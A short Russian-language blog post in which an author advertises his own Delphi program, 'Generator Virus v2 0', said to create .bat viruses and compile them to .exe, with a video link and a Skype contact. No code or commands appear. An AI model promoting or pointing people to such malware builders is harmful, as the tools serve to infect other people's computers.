Спецально для вас я написал программу Generator Virus v2 0 By Makish115 и сделал на неё озор которая создаёт любой bat вирус и КОМПИЛИРУЕТ ЕГО СРАЗУ В EXE! Вот видео: http://www.youtube.com/watch?v=D-7F87_6K3k&feature=share
Программа была написана на Delphi7

Подписывайтесь на канал ставте лайки! Всем удача! НА КАНАЛЕ МНОГО РАЗНЫХ программ и исходников!

С уважением Makish115 , скайп для связи: Makish_115

Написать комментарий








Свежие записи

Гугль

Мета

Счетчики


Rambler's Top100

Рубрики

  Разработка и дизайн — StvPromo.ru